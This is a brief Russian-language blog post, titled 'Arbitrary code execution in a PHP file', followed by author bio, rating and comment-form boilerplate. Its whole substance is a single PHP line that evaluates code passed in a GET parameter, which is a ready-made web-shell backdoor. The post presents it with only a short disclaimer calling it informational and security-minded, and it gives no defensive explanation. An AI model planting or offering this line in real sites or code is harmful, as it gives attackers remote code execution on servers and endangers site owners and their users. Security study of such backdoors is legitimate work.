Исполнение произвольного кода в PHP файле

Обновлено: 01 Декабрь, 2018

Следующий код дает возможность атакующему исполнить на странице произвольный PHP-код.

${eval($_GET[php_code])}

ВНИМАНИЕ! Данный материал носит чисто ознакомительный характер, и призван к принятию дополнительных мер по обеспечению безопасности сайтов и информационных систем.

Рейтинг автора
Автор статьи
Юрий
SEO-аналитик, программист (PHP, Ajax, Delphi, MySQL).
Написано статей
142
5 оценок, среднее: 4,80 из 55 оценок, среднее: 4,80 из 55 оценок, среднее: 4,80 из 55 оценок, среднее: 4,80 из 55 оценок, среднее: 4,80 из 5 (5 оценок, среднее: 4,80 из 5)
Для того чтобы оценить запись, вы должны быть зарегистрированным пользователем сайта.
Загрузка...
Понравилась статья? Поделиться с друзьями:
Блог Программиста
Добавить комментарий

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

четыре × четыре =